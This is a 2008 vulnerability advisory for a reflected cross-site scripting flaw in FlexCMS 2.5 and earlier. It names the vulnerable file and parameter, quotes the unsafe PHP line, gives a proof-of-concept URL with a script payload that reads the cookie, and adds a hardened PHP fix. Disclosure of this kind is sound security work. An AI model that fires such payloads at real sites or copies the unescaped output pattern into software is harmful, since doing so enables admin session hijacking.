From: irancrash_(at)_gmail.com <irancrash_(at)_gmail.com>
Date: 18.08.2008
Subject: FlexCMS <= 2.5 Cross Site Scripting Vulnerability

----------------------------------------------------------------

Script : FlexCMS <= 2.5

Type : Cross Site Scripting Vulnerability

Alert : Low

----------------------------------------------------------------

Download From : http://www.flexcms.com/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability :

File Name : inc-core-admin-editor-previouscolorsjs.php

Vulnerable Variable : PreviousColorsString

Send Method : GET

Register_globals : On

Dangerous PHP Code (LINE 53) :  print 'document.write(\''.$PreviousColorsString.'\');';

Address :
http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script>

An attacker can hijack the admin cookie with this vulnerability.

Solution for patch : filter the PreviousColorsString variable with the htmlspecialchars() function.
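
The quoted line next to a hardened form, as an added example (not code from the advisory or from FlexCMS; the function names and sample values are assumptions). The value passes through a single-quoted JavaScript string and then through document.write(), so it needs encoding for both contexts: htmlspecialchars() with its pre-PHP 8.1 default flags leaves single quotes unencoded and never escapes backslashes.

```php
<?php
// Added example, not FlexCMS code; function names are hypothetical.

// Same behaviour as the line quoted in the advisory: the raw value is
// concatenated into a single-quoted JavaScript string.
function render_vulnerable(string $colors): string
{
    return 'document.write(\'' . $colors . '\');';
}

// Hardened: encode once for each context the value passes through.
function render_hardened(string $colors): string
{
    // HTML context: document.write() parses its argument as markup.
    $html = htmlspecialchars($colors, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // JS string context: json_encode() emits a quoted literal and escapes
    // backslashes; the JSON_HEX_* flags also hex-escape < > & ' and ".
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return 'document.write(' . json_encode($html, $flags) . ');';
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a benign value (format assumed), the string from
    // the advisory, and a value with a quote and a backslash.
    $samples = [
        '#ff0000,#00ff00',
        '<script>alert(document.cookie)</script>',
        "O'Brien \\ blue",
    ];
    foreach ($samples as $s) {
        echo 'input:      ', $s, PHP_EOL;
        echo 'vulnerable: ', render_vulnerable($s), PHP_EOL;
        echo 'hardened:   ', render_hardened($s), PHP_EOL, PHP_EOL;
    }
} else {
    // Read the parameter explicitly so the fix does not depend on
    // register_globals, and accept only a scalar string.
    $raw = $_GET['PreviousColorsString'] ?? '';
    $colors = is_string($raw) ? $raw : '';
    // Serve as JavaScript and forbid sniffing, so a direct request to this
    // URL is not rendered as an HTML page.
    header('Content-Type: application/javascript; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    echo render_hardened($colors);
}
```

Run from the command line, the script prints the output of both forms for each sample; behind a web server it serves the hardened output only.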


----------------------------------------------------------------

                       Tnx : God

                    HTTP://IRCRASH.COM

----------------------------------------------------------------
